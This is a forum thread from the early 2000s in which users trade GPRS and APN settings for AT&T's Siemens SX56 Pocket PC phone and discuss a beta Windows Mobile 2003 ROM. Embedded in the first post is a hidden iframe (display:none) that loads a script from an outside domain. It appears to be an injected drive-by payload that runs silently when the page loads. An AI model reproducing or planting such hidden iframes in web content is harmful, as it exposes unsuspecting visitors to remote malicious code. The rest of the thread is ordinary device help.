Does anybody out there have any idea where I can find the GPRS settings to use with At&t's Siemens SX56 after a 2003 upgrade.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
It is very simple. First, you cannot use the proxy server so there are no proxy settings.
1. From settings go to connections
2. Under My ISP, select add a new connection
3. Edit the name if you wish, I use ATTWS GPRS but you can use anything
4. select "cellular line (GPRS)" from the modem drop down list
5. where it asks for access point enter "proxy"
6. just select "finish" and you are done!
You will find it works just fine and stays connected once you establish a connection.
There's a beta version of Windows Mobile aka Pocket PC 2003 being distributed online. I have used it on my Siemens SX56 prior to the A.20.17 ROM/A.20.10 RS flash and I must admit the beta is a bit on the buggy site. A few times I had to warm boot it after the welcome screen froze up, some software that worked with PPC 2002 wouldn't work with WM or would stall out, the signal strength seemed weaker than the OEM ROM and battery time appeared less. From what a PR person at HTC, the company behind the XDA, O2, SX56, etc., has stated, HTC's working with Microsoft to iron out the wrinkles with WM before it gets released to the various wireless carriers. If you decide to try the Windows Mobile 2003 beta, BACK UP YOUR ROM & RS FIRST so worst case scenario, you restore the ROM back to OEM via the Wallaby Boot Loader.
I have upgraded my ROM to WM2003, and have Tmobile, and I can not connect via GPRS, can anyone give me the new connection settings? I appreciate any help!

Can you point me to where I can get this beta? Those of us residing at the backside of the world cannot easily get what we want. Thanks in advance
For some reason, my phone (MPx 300) isn't receiving the OTA text msg's that automatically configure the device for mMode & MMS. I was able to find the mMode settings for the MPx device I have but now I need MMS settings...does anyone know?
The guides on the site are for a Pocket PC UI that isn't similar to the phones.
I can only give you the setting that work for my phone with AT&T, however the full details are on the AT&T Wireless Website. Just search for Siemens SX56 GPRS Settings.
Here is what I have:
New Connection Called GPRS
Modem is Cellular Line (GPRS)
Baud Rate is 115200 Windows should adjust this to whatever it needs to, so I just chose the highest one.
Access Point Name:
proxy
That shoud be it.
I can connect to the internet with these setting wirelessly and download items as well.
